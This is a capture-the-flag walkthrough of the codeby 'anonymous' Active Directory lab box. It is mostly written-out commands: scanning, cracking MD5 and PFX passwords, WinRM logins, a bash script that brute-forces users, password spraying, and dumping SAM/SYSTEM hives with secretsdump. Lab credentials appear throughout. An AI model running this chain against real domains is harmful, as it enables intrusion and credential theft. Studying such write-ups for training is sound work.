Anonymous codeby Walkthrough
Hello guys and a happy new yew. Welcome back to another walkthough and this time we are going to be looking at a box called anonymous from codeby . An easy machine in my opinion. We’ll start of by running an nmap scan and discover that it has a lot of ports open but most importantly it’s an Active directory domain contoller. All the standard enumeration reveals that most likely the entry point is not through a misconfigured module in active directory. Running a gobuster on the web application reveals a directory called database which contains a .sql database which has a credentials for an active directory user called veronika.koltsova. The password has been hashed using md5 and cracking it is a piece of cake which gives the plain text credentials. Authenticating to the box though winrm gives us a .pfx certificate file that’s encrypted. Cracking the encryption using john the ripper gives us another password and trying the password on the list of user yields a successful result. The user has SeBackupPrivilege enabled hence we can just backup the SAM and system hive for the domain controller transfer to out machine and extract the NTLM hashes. Get the administrator hash and finally pwn the box. Let’s jump in.
I begun by running an nmap scan on the box using the command
nmap --privileged -sC -sV -oA nmap/ad 192.168.2.20The results are as follows
# Nmap 7.95 scan initiated Sat Feb 1 15:35:03 2025 as: /usr/lib/nmap/nmap --privileged -sC -sV -oA nmap/ad 192.168.2.20
Nmap scan report for 192.168.2.20
Host is up (0.20s latency).
Not shown: 983 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-01 12:35:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: codeby.cdb0., Site: Default-First-Site-Name)
443/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: RedCock Farm
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: codeby.cdb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3306/tcp open mysql MariaDB 10.3.23 or earlier (unauthorized)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=anon.codeby.cdb
| Not valid before: 2024-11-15T20:04:35
|_Not valid after: 2025-05-17T20:04:35
| rdp-ntlm-info:
| Target_Name: CODEBY
| NetBIOS_Domain_Name: CODEBY
| NetBIOS_Computer_Name: ANON
| DNS_Domain_Name: codeby.cdb
| DNS_Computer_Name: anon.codeby.cdb
| DNS_Tree_Name: codeby.cdb
| Product_Version: 10.0.20348
|_ System_Time: 2025-02-01T12:35:36+00:00
|_ssl-date: 2025-02-01T12:35:47+00:00; 0s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8082/tcp open http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: RedCock Farm
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: Host: ANON; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-02-01T12:35:35
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 1 15:35:58 2025 -- 1 IP address (1 host up) scanned in 54.76 secondsLow hanging fruits on AD exploitation did not yield any results. like checking if the smbshare can be access by guest authentication. The command i used was
smbclient -N -L //192.168.2.20/
Try to access ldap using the below command gives an error
ldapsearch -x -H ldap://192.168.2.20/ -b "DC=codeby,DC=cdb" -s sub
Also,trying to access Microsoft remote procedural call protocol using rpcclient and the command gives an error
rpcclient -U "" -N 192.168.2.20
But the nmap result shows us that we have a web server running on port 443 and 8082.
Port 443 kept giving me an error
Port 8082 returns a web application which returns a login page.
The site has multiple vulnerabilities like Broken object level authorization which is a security vulnerability that occurs when an application or application programming interface (API) provides access to data objects based on the user’s role, but fails to verify if the user is authorized to access those specific data objects. But since the site is down am unable to show this vulnerabilities.
Given they didn’t lead to the solution it’s okay we can showcase the same vulnerabilities in a different walkthrough. Performing a directory brute forcing, using gobuster gives interesting results. The command used to run gobuster is as follow
gobuster dir -u http://192.168.2.20:8082/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 30
The most interesting directory was Database
Navigating to it we get an interesting database dump called farm.sql
I downloaded the database and looking though it we see some user credentials dumped from the database
(2, 1002, 'Admin', 'admin', 'Nikhil', 'Bhalerao', 9213979339, 'ndbhalerao91@gmail.com', 1, 'nikhil.png', '9ef87721f1241ba03fdb094bc47b157b', '2022-03-15 10:18:39'),
(9, 1003, 'Admin', 'staff', 'Veronika', 'Koltsova', 9050909090, 'veronika.koltsova@codeby.cdb', 1, 'pic_3.jpg', '1755250e750575059312c899278081b2', '2024-03-15 10:18:3I tried cracking both ndbhalerao91@gmail.com and veronika.koltsova@codeby.cdb hash and successfully cracked veronika.koltsova@codeby.cdb hash
I didn't crack the hash using hashcat but i used crackstation because it’s faster
veronika.koltsova@codeby.cdb:T.T.10_friendship-forever
Trying the credentials on smb worked. We are able to access the shares. The command i used was
netexec smb 192.168.2.20 -u "veronika.koltsova" -p "T.T.10_friendship-forever" --shares
Trying the credentials on winrm since it was open worked
The command i used was
evil-winrm -i 192.168.2.20 -u "veronika.koltsova" -p "T.T.10_friendship-forever"
Looking at the documents directory we get a pfx file
I downloaded the certificate back to my box using the command
download user.pfx
The certificate is encrypted with a password to crack the password in need to convert the pfx file into a format that john the ripper can understand. I used a program called pfx2john and the command
pfx2john user.pfx
I saved the hash in a file and tried cracking with john the ripper. the command i used was
john --wordlist=~/Desktop/boxes/wordlist/rockyou.txt pfx_hash 
We get the password is G0d0fWar. Next we can try to pass the certificate. A good blog post talking about it is below
First we need to decrypt the pfx file and i used the tool certipy to do that. The command i used was
certipy-ad cert -export -pfx "user.pfx" -password "G0d0fWar" -out "unprotected.pfx"
Next i tried authenticating to the domain using the decrypted certificate using the command
certipy-ad auth -pfx "unprotected.pfx" -dc-ip '192.168.2.20' -domain 'codeby.cdb'
But the certificate has no identification information meaning we cannot just extract user who’s the owner of this certificate.
There are many way we can dump all the users in this specific domain. I’ve show impackets-lookupsids before but for this walkthough I’ll use rpcclient. To authenticate via rpcclient i used the command
rpcclient -U "codeby.cdb\veronika.koltsova" 192.168.2.20
We’ve authenticated successfully. Next I’ll use enumdomusers command to get all active direcory users
There are a lot of users i copied them to a file and formatted them to only get the username using the command
cat users.tmp | awk -F \[ '{print $2}' | awk -F \] '{print $1}'
Using the usernames i created a brute force scripts that picks a single user and tries authenticating with the username and the decrypted certificate file
The script is as below
#!/bin/bash
# Define the input file
INFILE=/home/musyoka/Desktop/boxes/box_writeups/codeby/users
# Read the input file line by line using a for loop
IFS=$'\n' # set the Internal Field Separator to newline
for LINE in $(cat "$INFILE")
do
echo "$LINE"
certipy-ad auth -pfx unprotected.pfx -dc-ip 192.168.2.20 -username $LINE -domain codeby.cdb
doneBut after running the script no valid user was found
Thought i wouldn’t recommend doing above in an environment since this is bad opsec.
But remember we have a new password and a list of valid active directory account i tried performing a brute force with the pfx certificate password. The command i used was
netexec smb 192.168.2.20 -u users -p "G0d0fWar" --sharesLooking at the screenshot below we see that the password belongs to zoya.minina
Performing a login via winrm works. The command used was
evil-winrm -i 192.168.2.20 -u "zoya.minina" -p "G0d0fWar" 
Running whoami /all we see that we have SeBackupPrivilege
The following article helps to perform the attack
We just need to back the sam and system hive. The commands i used were
reg save hklm\sam C:\windows\temp\sam.hive
reg save hklm\system C:\windows\temp\system.hive
I copied both of them to my machine and using impacket-secretsdump i extracted the administrator’s hash using the command
impacket-secretsdump -sam sam.hive -system system.hive local
We can now login to the Active directory domain controller as administrator using the command
And the box is pretty much done. Though there was no much Active directory stuff to showcase